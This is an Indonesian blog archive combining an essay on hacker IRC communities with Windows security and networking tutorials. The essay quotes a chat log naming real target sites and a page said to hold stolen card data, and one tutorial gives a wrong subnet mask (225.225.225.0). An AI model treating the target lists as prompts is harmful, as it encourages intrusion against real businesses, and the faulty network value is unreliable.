Pertama, chatroom mampu berfungsi sebagai sarana komunikasi sosial dan dapat pula menjadi manifestasi kelompok sosial itu sendiri. Kemampuan chatroom menjadi sebuah sarana komunikasi sosial karena secara teknis di dalam chatroom para chatters dapat melakukan komunikasi interpersonal (private chat) dan komunikasi kelompok (public chat). Baik private chat maupun public chat, antar pelakunya harus berada dalam satu tempat yang sama (bertemu dalam satu chatroom tertentu) dan dalam waktu yang sama pula (real time). Salah satu tahap terjadinya interaksi sosial adalah adanya kontak, yang bisa bersifat sekunder (menggunakan media tertentu, dalam hal ini melalui chatroom) dan langsung (tanpa perantara individu lain meskipun tidak face-to-face).

Keduam chatroom mampu menjadi sebuah kelompok sosial. Hal tersebut tak lepas pula dari karakteristik teknis chatroom itu sendiri. Pertama-tama, kita definisikan dahulu arti kata kelompok sosial. Menurut George Hillery dalam jurnal CyberSociology (www.cybersoc.com), ciri komunitas adalah adanya sekelompok orang yang saling melakukan interaksi sosial dan ada suatu persamaan yang mengikat mereka pada kelompok tersebut dan antar sesama anggota kelompok, serta mereka berbagi area tertentu dalam jangka waktu tertentu.

Geoffrey Liu dalam jurnal Computer-Mediated Communication (www.ascusc.org/jcmc), menetapkan beberapa syarat terjadinya komunitas atau kelompok sosial maya, yaitu: (1). adanya ruang publik maya, (2). adanya aktifitas komunikasi dari para komunikator, (3). adanya anggota dengan jumlah besar sehingga memungkinkan terjadinya beberapa interaksi, (4). adanya kestabilan jumlah anggota dan konsistensi pemunculan anggota dan (5). adanya interaktifitas pesan verbal, pesan simulasi aksi dan konsistensi penggunaan nickname.

Di dalam chatroom, khususnya server DALnet, ada jenjang struktural dan fungsional yang baku. Jenjang pertama dan tertinggi adalah founder, super operator (SOP) dan auto operator (AOP) dan temporary operator. Keempat jabatan tersebut selain struktural, juga fungsional. Mereka secara umum disebut Operator (OP) dan menggunakan tanda "@" di depan nickname mereka. Nickname mereka secara otomatis akan berada di urutan teratas dari listname pengunjung chatroom. Ketiganya merupakan penguasa sebuah chatroom yang dapat mengundang orang lain untuk datang, mengusir paksa orang dan mengawasi setiap percakapan publik yang terjadi di chatroom.

Founder adalah pemegang akses tertinggi dalam sebuah chatroom dan hanya dipegang oleh satu orang saja. Seorang founder bisa mengangkat SOP dan AOP. SOP bisa mengangkat AOP. Pengangkatan para SOP dan AOP tersebut memerlukan pendekatan kepada atasaanya. Karena tidak jarang para chatters terpisah antar negara dan sama sekali tidak pernah bertemu satu dengan yang lainnya secara face-to-face. Pengangkatan jabatan tersebut harus berdasarkan kepercayaan dan tidak jarang dengan melakukan lobi-lobi.

Kembali ke pendapat Hillery, syarat penting terjadinya sebuah komunitas maya adalah adanya suatu persamaan yang mengikat mereka pada kelompok tersebut dan antar sesama anggota kelompok, serta mereka berbagi area tertentu dalam jangka waktu tertentu. Para anggota kelompok hacker di chatroom memiliki persaman yang mengikat yaitu anggotanya sama-sama menyatakan dirinya sebagai hacker dan memiliki tujuan untuk melakukan hacking. Mereka juga berbagi area kekuasaan tertentu dalam jangka waktu tertentu. Area tersebut ialah sebuah chatroom.

Konsep area dalam chatroom ini tidak berbeda jauh dengan konsep area kekuasan dalam dunia nyata. Dalam chatroom pun ada istilah penguasa lahan (operator), perebutan lahan (channel takeover) dan intimidasi area (flooding). Ada kalanya para anggota sebuah chatroom melakukan "serangan" ke chatroom lain. Selain itu dikenal pula istilah "meminta jasa keamanan" kepada operator yang ahli, biasanya adalah operator di sebuah chatroom besar, yang dalam dunia nyata disebut sebagai God Father. Bagi chat room kecil atau yang baru memiliki anggota sedikit, tidak jarang diganggu oleh pihak yang iseng. Operator chatroom besar rata-rata memiliki pengalaman dan pengetahuan yang lebih baik dalam mengatur sebuah channel dan mengatasi permasalahan yang timbul.

Operator tersebut kemudian diangkat sebagai SOP oleh founder chatroom kecil dan diajak untuk bergabung dalam channel kecil tersebut, walapun hanya sekedar meletakkan nickname saja. Dengan adanya God Father dari chatroom besar tersebut, maka tingkat gangguan terhadap chatroom kecil tersebut dapat dikurangi. Setidaknya membuat pihak yang ingin mengganggu tersebut harus berpikir dua kali, karena bisa saja dia yang terkena serangan balasan atau dicekal untuk masuk ke chatroom lain yang dipegang oleh God Father tersebut.

Salah satu ciri khas yang membedakan antara hacker yang tidak bergabung dengan suatu kelompok hacker tertentu dengan hacker yang memilih bergabung adalah dari kebiasaan meninggalkan "catatan" dalam tampilan sebuah situs yang telah dimodifikasi oleh hacker tersebut. Bagi hacker tanpa kelompok, dia hanya meninggalkan catatan atas nama nickname atau inisial hacker tersebut.

Salah satu contohnya adalah ketika Fabian Clone pada hari Jumat tanggal 24 Mei 2000 menembus sistem sekuriti situs Indofood.co.id dan Rekayasa.co.id, dia hanya meninggalkan pesan-pesan yang diakhiri dengan inisial "F.C.". Sedangkan bagi hacker yang berkelompok, dia akan menuliskan nama kelompoknya. Salah satu contohnya adalah ketika hC- pada hari Kamis tanggal 16 Mei 2000 menembus sistem sekuriti situs PLN-Jawa-Bali.co.id, dia meninggalkan pesan-pesan tertentu sekaligus mengucapkan salam antara lain kepada rekannya dari kelompok hacker AntiHackerlink.

Di dalam chatroom, kerap terdapat ajakan-ajakan eksplisit atau motivator-motivator untuk melakukan hacking. Salah satu contohnya adalah logs chatroom #AntiHackerlink di bawah ini :

===== Start Logs =====
Session Start: Wed Mar 21 12:38:10 2001
[12:38] *** Now talking in #antihackerlink
[12:38] *** Topic is '__4, http://www.multysistem.it/, http://www.nicastroebarone.it/ ,http://www.salvatoremirmina.it/ http://www.pensionescala.it/sakitjiwa.txt, http://www.roseeroselline.it/ http://www.cavi-vivai.it/ _ _12New TargeT _www.westernunion.com www.paypal.com _> yg bisa di akui jadi hacker sejati_ <- both of them _'
[12:38] *** Set by chikebum on Wed Mar 21 11:56:49
[12:38] #antihackerlink url is pimp.goes.to.hell.with.the.support.from._antihackerlink.org_
---cutted---
Session Time: Thu Mar 22 00:00:00 2001
---cutted---
[07:24] *** Wagimin changes topic to '_ANTIHACKERLINK IS BACK !!!_ | The Hot News seen www.westernunion.com http://www.detik.com/net/2001/03/21/2001321-114641.shtml ! || Last target www.paypal.com || [eF!] My Gift for #ANTIHACKERLINK :: http://hacked.centralbankasia.com/ [eF!]_'
---cutted---
[07:24] ANTIHACKERLINK IS BACK!
[07:24] ANTIHACKERLINK IS BACK!
===== End Logs =====

Perbedaan jam antara informasi logs tersebut dengan WIB adalah +7. Dari logs tersebut bisa dijelaskan bahwa pada pukul 19.38 WIB, Chikebum memasang topic di #AntiHackerlink yang intinya berisi ajakan atau motivasi untuk melakukan hacking ke situs Western Union salah satunya. Pada pukul 06.19 WIB keesokan harinya, dotcom- mengirimkan e-mail ke penulis yang mengatakan bahwa dia dan eF73 berhasil masuk ke server WesternUnion.com. Siang harinya berita bobolnya server Western Union tersebut dimuat oleh situs www.detik.com. Kemudian pada pukul 14.24 WIB, Wagimin, alias eF73, memasang topic di #AntiHackerlink tentang keberhasilan eF73 dan dotcom- menembus server Western Union, sekaligus memasang alamat situs berita dari Detikcom yang memberitakan keberhasilan mereka.

Sedangkan alamat situs http://hacked.centralbankasia.com merupakan salah satu tempat curahan data-data kartu kredit dari toko buku online Barners & Nobles yang sistemnya baru saja ditembus oleh AntiHackerlink. Kedua peristiwa tersebut membuat C1sc0- "bersorak" gembira. Hal tersebut merupakan contoh adanya kemungkinan melakukan tindakan persuasif atau memotivasi orang lain di dalam chatroom. Salah satu kebanggaan hacker yang membentuk kelompok maya di chatroom adalah ketika hasil hackingnya dipasang sebagai topic channel, sehingga setiap pengunjung chatroom tersebut pasti membaca isi topik. Terlebih lagi apabila di dalam topik tersebut adalah alamat situs tempat berita keberhasilannya itu dimuat.

Saling memotivasi dan saling memberikan salut merupakan hal yang lumrah dan kerap terjadi di chatroom hacker. Bukti lain bahwa chat room dapat menjadi sarana belajar belajar atau motivasi perilaku hacking adalah ketika hC-, seorang hacker Indonesia yang didenda Rp 150 juta oleh pengadilan Singapura pada tanggal 30 Agustus 2000 karena membobol jaringan komputer di Singapura, oleh Kepolisian Singapura dirinya dinyatakan menggunakan chatroom untuk mempelajari teknik penyusupan ke sebuah jaringan komputer.

Kita kembali kepada konsep Liu tentang syarat eksistensi sebuah komunitas maya., khususnya dalam hal konsistensi pemunculan anggota dan adanya interaktifitas pesan simulasi aksi. Makna pemunculan anggota di sini adalah keberadaan individu dalam sebuah area tertentu secara konsisten. Keberadaan individu tersebut dimanifestasikan dengan keberadaan sebuah nickname yang digunakan secara tetap pada sebuah chatroom secara regular dalam jangka waktu tertentu. Sedangkan interaktifitas pesan simulasi aksi adalah keberadaan bahasa-bahasa verbal dalam bentuk teks atau tulisan yang memiliki makna atau dimaknai sebagai sebuah aksi yang benar-benar dilakukan.

Jika kedua hal ini digabung, maka maknanya adalah pemunculan nickname secara konsisten dalam sebuah chatroom tertentu yang antara lain dapat melakukan simulasi aksi. Simulasi aksi baru memiliki makna apabila dilakukan secara real-time kepada lawan bicara. Ungkapan "saya mencium kamu" misalnya, akan memiliki makna yang berbeda ketika disampaikan melalui chatroom dan ketika melalui e-mail.

Dalam e-mail, rasa dan makna kehadiran "pada saat itu" menjadi tidak penting. Kejadian bisa terjadi kapanpun (tidak real-time) dan dimanapun (tanpa harus bertemu di satu tempat tertentu). Kejadian apapun yang di dalam milis, termasuk simulasi aksi tersebut, tidak akan memiliki makna seperti dalam chatroom.

Dalam chatroom, rasa dan makna kehadiran menjadi sangat penting. Karena tanpa hadir dalam satu saat yang sama dan tempat maya yang sama, komunikasi dan interaksi tidak akan terjadi. Hal tersebut menjelaskan mengapa simulasi aksi tersebut dapat sedemikian bermakna di chatroom. Kejadian maupun simulasi aksi tersebut benar-benar "dilakukan" dan "terjadi" pada saat itu.

Makna "saya mencium kamu" di dalam milis bisa jadi bermakna seperti sekedar rayuan, sekedar angan, obsesi maupun bayangan. Tetapi jika di chatroom "saya mencium kamu" bisa bermakna "saya saat ini sedang mencium kamu" dan benar-benar tengah terjadi (secara virtual atau setidaknya dalam benak pelaku). Untuk itulah maka konsep-konsep tentang cybersex lebih mengacu kepada chat, ketimbang e-mail. Komunikasi interpersonal akan terasa lebih personal, intensif dan menyentuh bila terjadi secara realtime.

Berdasarkan beberapa hal tersebut di atas, ikatan emosi antar anggota sebuah chatroom jauh lebih kuat ketimbang antar anggota sebuah mailing-list. Hal ini menjelaskan mengapa walaupun para hacker banyak berlangganan mailing-list security, eksistensi mereka tetap dimanifestasikan dalam chatroom. Sekedar contoh, yang kerap disebut sebagai anggota hacker Jasakom bukanlah mereka yang tergabung dalam mailing-list Jasakom, tetapi lebih kepada mereka yang secara konsisten muncul di chatroom #Jasakom.

Melindungi Program Billing Warnet

2008-06-07T04:43:00.000-07:00

==================================
Melindungi Program Billing Warnet
==================================
June, 30, 2001

by Chandraleka
chandrk@hotmail.com
http://come.to/digitalworks
http://www.geocities.com/hchandraleka/index.html

Artikel ini merupakan solusi dan himbauan kepada khususnya para pengusaha warnet dan
rental pengetikan yang menggunakan program billing komputer sebagai cara menghitung biaya
pemakaian komputer. Karena kebanyakan program billing yang mereka gunakan mengambil waktu dari
komputer client, sehingga terdapat celah bagi para penyewa komputer tersebut untuk mengubah
lama pemakaian sewa komputernya.

Umumnya dan kebanyakan program billing yang ada mengambil waktu dari komputer lokal (client)
sehingga apabila timer di pojok kanan bawah diubah mundur maka perhitungan program billing
berubah. Misalnya, seharusnya sudah Rp 8000 menjadi Rp 6000, karena durasi pemakaian telah
dikurangi. Hal ini tentu akan sangat merugikan bagi para pengusaha warnet atau rental komputer
biasa. Untuk itu artikel ini hadir untuk membuat solusinya dengan cara yang paling mudah dan
murah.
Penulis tidak menyarankan untuk meng-upgrade dan memperbaiki program billing tersebut
karena akan memerlukan biaya yang mahal kecuali warnet tersebut telah mempunyai programmer
sendiri, tetapi tetap gunakan saja program billing yang sudah ada itu dengan ditambah cara untuk
memproteksi timer komputer. Jadi program billing yang ada tetap digunakan dan dibarengi dengan
melindungi timer komputer dari perubahan tangan - tangan usil user penyewa warnet.

Pada dasarnya akses ke timer komputer dapat diperoleh dengan tiga cara yaitu :
1. Melalui Start | Setting | Taskbar & Start Menu
2. Melalui Start | Setting | Control Panel | Date/Time
3. Klik kanan pada taskbar dan pilih Properties kemudian check Show Clock dan tekan OK.

Dengan memproteksi atau memblok akses ke timer komputer, maka user tidak dapat mempermainkan
durasi waktu yang telah dihitung oleh program billing kita. Ikuti langkah - langkah berikut
untuk memproteksinya :
1. Klik kanan taskbar dan pilih Properties, kemudian uncheck Show Clock dan tekan tombol
OK. Dan jangan senang dulu karena langkah ini belum apa - apa.
2. Tekan Start | Run, dan ketik "Regedit" pada bagian Open.
3. Mulai step ini pembaca akan mempermainkan registry Windows, suatu bagian yang paling
vital dari sistem Operasi Microsoft Windows.
4. Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
5. Klik Edit | New | DWORD Value. Beri nama dengan "NoSetFolders" dan isikan dengan
nilai "1".
6. Klik lagi Edit | New | DWORD Value. Beri nama dengan "NoSetTaskbar" dan isikan dengan
nilai "1".
7. Buka key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.
8. Klik lagi Edit | New | DWORD Value. Beri nama dengan "DisableRegistryTools" dan isikan
dengan nilai "1". Bagian yang terakhir ini untuk memblok pengaksesan registry. Sehingga user
tidak dapat mengubah - ubah registry.
9. Restart PC dan program billing Anda telah terlindungi dengan baik. Have An Ice Day…..

Ini hanyalah satu tips sederhana untuk melindungi program billing dalam usaha mencegah kerugian
yang akan kita dapat ….

-----^v^-----

Melindungi Administrator Account Windows 2003 Server

2008-06-07T04:42:00.000-07:00

Melindungi Administrator Account Windows 2003 Server

- Saturday, May 14, 2005 :: 23:36

Pendahuluan

Tidak terlalu banyak user account yang dibuat pada default Windows Server 2003 domain controller yang terinstall pada Active Directory. Adakalanya, salah satu user account yang perlu anda lindungi diatas seluruh account yang ada adalah Administator account. Account ini merupakan salah satu default account yang merupakan hak akses tertinggi pada Active Directory, domain controller, member server, client dan network service.

Administrator account pada Active Directory hanyalah salah satu dari sekian banyak Administrator account pada jaringan. Setiap member server dan client memiliki sebuah local administrator account, yang dirancang untuk memiliki kendali atas komputer dimana ia berada. Banyak informasi yang telah dibahas dalam artikel ini juga bisa digunakan untuk memproteksi local Administrator account. Cara terbaik untuk menyediakan kendali ini adalah dengan menggunakan Group Policy dari Active Directory.

Kita akan berfokus pada perlindungan Active Directory Administrator account, karena account ini memiliki pengaruh yang sangat luas. Bayangkan betapa banyaknya Administrator account yang bertanggung jawab mengontrol seluruh obyek dalam domain tersebut. Administrator account yang berada pada Active Directory pertama memiliki hak akses (privilege) khusus. Administrator account ini juga memberikan Enterprise Admins dan Schema Admins membership. Keberadaan ini dimaksudkan untuk mengontrol setiap obyek dalam forest yang ada, sama kuatnya dengan forest schema.

Seberapa pentingnya account ini?

Account Administrator di level Active Directory mencakup seluruh kemampuan komputer, termasuk domain controller, yang berisikan domain. Maksudnya bahwa user account ini dapat melakukan logon ke semua komputer, mengakses file apapun, dan menginstall aplikasi apapun. Bahkan jika local Administrator menghapus akses terhadap domain Administrator account, domain Administrator tersebut masih bisa di rampas kembali.

Ada juga hak akses penting yang dimiliki domain Administrator account, yang menyediakan kemampuan besar. Administrator bisa menambah komputer ke domain, memodifikasi user account apapun (termasuk password) dan membuat Group Policy Object (GPO) tanpa gangguan. Hak akses ini tidak dapat dihapus pada user account ini, semenjak mereka dibuat ada.

Dalam sistem operasi lawas, faktor kunci lain terhadap account ini tidak dapat dihapus atau disable. Hal ini menimbulkan masalah tertentu bagi sebagian administrator jaringan untuk mencoba dan melindungi account tersebut. Semenjak Windows Server 2003, Microsoft telah menyediakan kemampuan untuk mendisable-kan Administrator account. Kita akan membahas fitur ini nanti saat kita membahas tentang langkah-langkah yang dapat diambil guna melindungi account tersebut.

Mengapa account ini menjadi target?

Kaum Hacker dan Attacker menargetkan account ini untuk banyak alasan. Selain alasan yang telah dijelaskan di atas, para Attacker mengetahui banyak perihal account ini di berbagai environment.

Pertama, Administrator account disetiap komputer Windows keberadaannya memiliki Security Identifier (SID) yang mirip. SID merupakan karakter alpha-numerik tertentu yang digunakan oleh sistem operasi untuk melacak account dan memberikan akses terhadap sumber-daya. Apakah yang kita bicarakan mengenai Administrator account di Active Directory domain pertama atau account pada komputer Windows 2000 Professional, SID selalu berakhir dengan angka 500, sebagaimana yang ditunjukkan gambar dibawah ini:

Gambar 1: Administrator account pada komputer Windows selalu diakhir dengan angka 500

apakah kemampuan ini merupakan target yang mudah bagi attacker. Semenjak SID selalu diakhiri dengan angka 500, mereka menjadikan target account tersebut hanya dengan mengenumerasi SID dari Active Directory atau local SAM. Hal ini mungkin saja terlihat sulit, tapi tool seperti SID2USER dan USER2SID telah banyak mengatasi berbagai kesulitan ini untuk Anda.

Kedua, menurut sejarahnya, account ini harus ada pada Windows NT dan Windows 2000 Active Directory domain tidak dapat di disable atau dihapus. Hanya pada Windows Server 2003 maka account ini bisa di disable. Hal ini memungkinkan seorang attacker memiliki hak akses “administrator” account.

Terakhir, Administrator account merupakan target yang mudah bagi kebanyakan instalasi Active Directory dan Windows. Anda akan terkejut (mungkin juga tidak) betapa banyak perusahaan yang tidak melindungi account ini. Sebelum Windows Server 2003, Administrator account telah terinstall dengan blank password. Kita semua mengetahui bahwa password merupakan sebuah ijin untuk mengatur dan mengingat, jadi banyak perusahaan yang meninggalkan account ini tidak terlindungi dengan tidak merubah nama, tidak mengkonfigurasi password terkait (atau seluruh password).

Tingkat Dasar

Dengan begitu banyaknya alasan untuk melindungi account ini, berikut ini beberapa langkah dasar yang diambil guna melindungi Administrator account.

1. Gantilah nama – jika anda membiarkan nama yang sama secara default, hal ini sama saja memberikan setengah informasi yang diperlukan seorang attacker untuk logon dengan account tersebut. Banyak perusahaan mengubah nama tersebut untuk disesuaikan dengan skema penamaan user yang lain. Jadi, nama Joe Smith bisa jadi adalah Administrator account untuk mengelabui para hacker dan end user.

2. Hapus keterangan – keterangan dari Administrator account yang menyatakan bahwa ini adalah default Administrator account, harus diubah (atau dihapus) untuk melindungi account tersebut.

3. Buatlah sebuah Administrator account “palsu” – sebagian para attacker akan mencari nama Administrator. Jadi, jika anda membuat sebuah account yang tidak memiliki hak akses dan bahkan di disable, para attacker tidak memiliki kesempatan untuk mendapatkan akses ke jaringan anda melalui account ini.

4. Gunakan password yang kompleks untuk account ini – yang saya maksudkan dengan kompleks disini sama halnya dengan sistem operasi yang digunakan. Disini, saya menyarangkan agar anda membuat sebuah password kalimat untuk account ini. Saya sarankan agar anda menggunakan password seperti ini:

Saya tinggal di Arizona dimana suhu rata-rata selama musim panas adalah 105

5. Jangan gunakan account ini – saya menemukan banyak perusahaan yang menggunakan account ini untuk perawatan rutin, tugas-tugas, dan administrasi. Saya juga menemukan bahwa account ini dikonfigurasi sebagai service account untuk banyak network service. Account ini seharusnya tidak pernah digunakan, terkecuali bila terjadi kerusakan yang memerlukan account ini digunakan untuk mengakses domain controller.

Tingkat Lanjut

Kelanjutan dari langkah-langkah dasar yang dilakukan untuk melindungi account ini, adalah trik yang dapat anda lakukan untuk mendapatkan akses dan keamanan Administrator account ke sebuah level baru.

1. Disable the Administrator account – ini adalah setting Group Policy yang memungkinkan anda mendisable account dalam domain dan local SAM pada Windows XP dan Windows Server 2003 computer. Policy ini ada dibawah setting GPO berikut:

Computer Configuration|Windows Settings|Security Settings|Local Policies|Security Options|Accounts: Administrator account status

Setting policy ini bisa dilihat pada gambar 2, dan tinggal diatur ke Enable untuk melakukan setting ini.

Gambar 2: Setting GPO yang memungkinkan anda mendisable Administrator account

2. Gantilah Administrator account dengan menggunakan GPO – akan sulit mendisable setiap Administrator account pada setiap komputer untuk aplikasi dan kebutuhan lainnya. Dalam kasus ini anda melakukan pendekatan yang mudah untuk memastikan bahwa Administrator account telah diganti. Anda dapat mengonfigurasi setting GPO berikut, yang bisa mengganti Administrator account pada komputer Windows 2000, XP atau Server 2003.

Computer Configuration|Windows Settings|Security Settings|Local Policies|Security Options|Accounts: Rename Administrator account

3. Deny “Access this computer from the network” User Right – dengan default Administrator account yang dikelompokkan kedalam Everyone and Authenticated Users group, yang memberikan account tersebut kemampuan mengakses seluruh komputer pada jaringan secara default. Pada saat Administrator account tidak digunakan untuk keperluan administrasi rutin, maka tidak perlu account tersebut untuk mengakses berbagai sumber, server atau jaringan. Jika anda mengonfigurasi setting Group Policy User Right berikut untuk Administrator account, maka akan mengurangi resiko penyerangan terhadap Administrator account.

Computer Configuration|Windows Settings|Security Settings|Local Policies|User Rights Assignment|Deny access to this computer from the network

Kesimpulan

Administrator account merupakan sesuatu yang powerful di dunia Windows. Entah anda membicarakan tentang Administrator account dalam Active Directory atau Administrator account yang lebih rendah pada local SAM dari komputer Windows 2000 Profesional, account tersebut memiliki hak akses tertinggi atas seluruh user account secara default. Anda perlu mengambil langkah yang sesuai untuk melindungi account ini guna memastikan bahwa hal ini tidak di ekspos dan mengurangi resiko sistem anda dilumpuhkan. Ada beberapa langkah dasar (seringkali diabaikan) yang bisa anda gunakan untuk melindungi account ini. Setelah langkah-langkah dasar tersebut anda bisa mengonfigurasi lebih lanjut untuk mengurangi resiko serangan yang lebih jauh.

Tentang Derek Melber

Konsep Dasar TCP IP

2008-06-07T04:40:00.000-07:00

TCP/IP
Merupakan sekumpulan protokol yang mengatur komunikasi data antar
komputer di internet/jaringan, dengan adanya protokol-protokol
tersebut dimungkinkan adanya komunikasi data antara komputer yang satu
dengan yang lainnya tanpa membedakan jenis komputer dan sistem operasi
pada komputer tersebut.

TCP/IP
Merupakan sekumpulan protokol yang mengatur komunikasi data antar
komputer di internet/jaringan, dengan adanya protokol-protokol
tersebut dimungkinkan adanya komunikasi data antara komputer yang satu
dengan yang lainnya tanpa membedakan jenis komputer dan sistem operasi
pada komputer tersebut.

TCP/IP terdiri dari 4 lapis kumpulan protokol yaitu:

+-------------------------+
Aplication Layer
(HTTP,FTP,SMTP,dll)
+-------------------------+
Transport Layer
(TCP,UDP)
+-------------------------+
Internet Layer
(IP,ICMP,ARP)
+-------------------------+
Network Interface Layer
(Ethernet,X25,SLIP,PPP)
+-------------------------+

1. Network Interface Layer
Berfungsi untuk mengirim data ke media fisik dan menerima data
dari media fisik, media fisik bisa berupa kabel, serat optik dan
gelombang elektromagnetik.

2. Internet Layer
Berfungsi untuk melakukan pengiriman paket data dengan tepat
pada layer ini terdapat: IP, ICMP, ARP
-- IP (Internet Protocol)
Untuk melakukan pengiriman paket ke alamat yang tepat.
-- ICMP (Internet Control Message Protocol)
Untuk mengirim pesan-pesan kesalahan.
-- ARP (Address Resolution Protocol)
Untuk pemetaan IP Address dengan Ethernet adress, dimana
masing-masing Ethernet memiliki Ethernet Address yang unik,
dengan ARP dapat diketahui bahwa IP Address tertentu dimiliki
oleh Ethernet tertentu.

3. Transport Layer
Ada 2 Yaitu:
a. TCP (Transmission Control Protocol)
sifat TCP:
-- Connection Oriented
-- Reliable
-- Byte Stream Service
b. UDP (User Datagram Protocol)
Sifat UDP:
-- Connectionless
-- Tidak ada pengurutan kembali paket yang datang
-- Tidak ada Acknowledgement paket yang datang
-- Tidak ada Retransmisi

4. Aplication Layer
Aplikasi yang digunakan untuk melakukan pengiriman data maupun
penerimaan data.

Semoga esok hari kami bisa memberikan uraian yang lebih
mendalam dan jelas, atau mungkin teman² ada yang bisa
menambahkan, THX

konfigurasi jaringan berbasis windows 2000

2008-06-07T04:39:00.001-07:00

Ini artikel pertama saya dan mungkin kurang berkualitas.Mudah2an bisa di trima.Mengkonfigurasikan jaringan dalam komputer klien adalah langkah sebelum mulai menggunakan jaringan.Dalam konfigurasi komputer klien,ada dua hal yang harus diperhatikan.

pertama penentuan jenis protokol yang akan di pasang di setiap komputer lalu langkah kedua adalah instalasi protokol dan konfigurasi alamat setiap komputer.Langkah ke tiga adalah mengconfigurasikan geteway atau proxy server dalam aplikasi internet.Langkah ini perlu dilakukan apabila klien boleh mengakses internet.

Penentuan protokol jaringan

Sebelum menginstall protokol jaringan perlu di ketahwi bahwa dalam komunikasi jariang LAN berbasis sistem Windows (win9x,NT,2000,XP) biasanya dipakai protokol NetBEUI.Ini merupakan penyempurnaan dari protokol NETBIOS yang dipakai oleh sistem operasi jaringan.Protokol ini bersifat non-routable ,artinya tidak dapat menghubungkan komputer dalam segmen jaringan yang berbeda.

Protokol NetBEUI akan di Install secara default saat men-konfigurasikan jaringan dalam Windows.Namun jika ingin mengkoneksikan jaringan klien jaringan ke Internet tidak menggunakan NetBEUI namun menggunakan protokol TCP/IP.Selain di gunakan mengkoneksikan jaringan ke internet TCP/IP juga bisa digunakan untuk LAN.Khusus untuk keperluan LAN tersedia sekelompok IP yang telah di sediakan ,yakni kelompok 10.x.x.x,172.16.x.x serta 192.168.x.x.Huruf "x" dalam setiap kelompok alamat diganti dng angka yang bernilai antara 1 sampai 254.

Instalasi Protokol Jaringan

1.Klik kanan icon Network neighborhood(win 9.x) atau my network place (win 2000) pada desktop.Setelah itu pilih properties.

2.Akan muncul windows network dan Dial UP conection.Pilih properties pada jaringan anda.

3.Pilih pilihan Internet protokol TCP/IP,Lalu klik properties.(Jika ada dua pilihan TCP/IP,pilih yang menuju kartu jaringan.)Setelah itu pilih tab general pilih pilihan use the following IP Address.Tidak boleh 2 atau lebih komputer menggunakan alamat IP yang sama.Bisa menggunakan alamat 192.168.0.3 ,192.168.0.4 dan seterusnya.sebaliknya masukkan nilai sama pada subnet mask untuk setiap komputer.Jadi komputer server,komputer klien pertama,kedua dan ketiga menggunakan subnet mask yang sama,misalnya 225.225.225.0

4.Setelah tombol OK,Anda akan kembali ke jendela configurasi Local Area Network conection properties.Klik pilih file dan printer sharing.Jika belum ada pilihan tersebut maka haru di-Intall terlebih dahulu.

5.Mengisikan Identification bagi komputer kita.klik kanan pada icon my network place lalu pilih properties.Pada menu toolbar,pilih network identification.

6.Pada jendela network identification ,klik pilih properties.lalu isikan nama komputer yang di inginkan.Pada bagian workgroup,isikan nama workgroup yang di inginkan.Nama komputer harus berbeda namun nama workgroup haruslah sama.Setelah itu OK.

7.Windows akan secara otomatis akan meng-install file-file yang akan di perlukan.setelah itu mungkin proses restart akan dilakukan.Ulangi langkah-langkah ini setiap komputer yang yang akan dihubungkan ke LAN.
Setelah komputer di restart ,maka akan muncul jendela yang akan meminta anda login.masukkan user dan password seperti yang anda telah lakukan atur sebelumnya.Pada windows 2000 system akan secara otomatis mendetec seluruh jariang komputer yang telah di buat sebelumnya.

Gateway

Gateway berfungsi untuk sebagai penghubung LAN yang berbeda segmen atau kelasnya.Apabila dalam LAN terdapat lebih dari 1 workgroup ,maka untuk dapat melakukan koneksi ke komputer yang terhubung di dalam lan tetapi berlainan workgroup dengan cara FIND----> Isikan Komputer Nama --> Atau IP address komputer tersebut.

mohon maaf jika kualitas atau penulisan ini ada yang salah.Terimakasih.

Kiat Sederhana Meningkatkan Security di Sistem Windows

2008-06-07T04:33:00.000-07:00

======================================================
Kiat Sederhana Meningkatkan Security di Sistem Windows
======================================================
July, 27, 2001

by Chandraleka
Chandrk@hotmail.com
http://www.geocities.com/hchandraleka

Security merupakan hal yang amat penting dalam bekerja dengan komputer. Security yang
handal menyebabkan bekerja dengan PC menjadi aman dan nyaman. Kita akan terlepas dari perasaan
was - was akan hilang atau berubahnya data tanpa sepengetahuan kita. Kita juga tidak ingin isi
komputer kita diintai atau diacak - acak oleh pihak lain. Kita ingin data dan komputer kita
terlindungi dengan baik. Pendek kata privacy terjaga.
Dalam artikel ini penulis akan menjelaskan tentang cara meningkatkan sekuriti pada sistem
operasi Windows, utamanya Windows 9x. Meskipun pada dasarnya Windows mempunyai banyak celah
untuk bisa ditembus, namun setidaknya kita berusaha untuk menutup celah - celah yang ada agar
bisa memfilter user - user yang menggunakan PC kita. Setidaknya user - user yang belum paham
cara menembusnya tidak dapat masuk ke komputer kita.

1. Password BIOS.
BIOS merupakan singkatan dari Basic Input Output System, suatu memori yang berisi setting -
setting seperti waktu, tanggal, tipe harddisk, disk drive, urutan booting, virus protection,
kontrol waktu DRAM, setting IRQ, dll. Ada tipe - tipe BIOS yang dapat diset passwordnya
sehingga apabila komputer kita booting, maka sebelum komputer mengakses harddisk atau disket,
BIOS akan menanyakan passwordnya terlebih dahulu. Untuk memasang passwordnya, pembaca harus
masuk ke BIOS Setup dengan menekan tombol 'Delete' pada keyboard pada awal waktu komputer
booting. Setelah masuk, sorot kata Password dan isikan passwordnya.
Ini merupakan proteksi yang handal karena BIOS tidak akan meneruskan proses booting - yaitu
mengakses disket atau harddisk - sebelum user menuliskan passwordnya dengan benar.

2. Membuat Program Untuk Disisipkan Di Boot Record Hard Disk.
Pembaca dapat juga membuat program - program password yang sederhana untuk kemudian disisipkan
di boot record harddisk. Kenapa di boot recordnya ? Karena bagian harddisk yang mula - mula
diakses adalah boot record. Bahasa pemrograman yang baik untuk membuat program semacam ini
adalah bahasa Assembly.

3. Booting Ke Modus Dos.
Lebih baiknya komputer diset untuk booting ke Dos prompt. Caranya dengan memodifikasi file
msDos.sys yang ada di direktori c:\. Pembaca dapat membuka file tersebut dengan menggunakan
Notepad. Kemudian ganti nilai bootgui = 0. Jangan diubah bagian yang lainnya, kemudian
langsung disimpan.
Booting ke Dos ini dimaksudkan untuk menjaga agar komputer tidak mengeksekusi program -
program yang berpotensi merusak saat memasuki modus Windows sehingga kita dapat melihat
program - program yang akan dijalankan oleh Windows. Coba pembaca berpindah ke direktori
C:\Windows\Start Menu\Programs\StartUp. File - File yang ada di direktori ini secara otomatis
akan dieksekusi / dijalankan oleh Windows pada saat komputer booting dan masuk ke modus
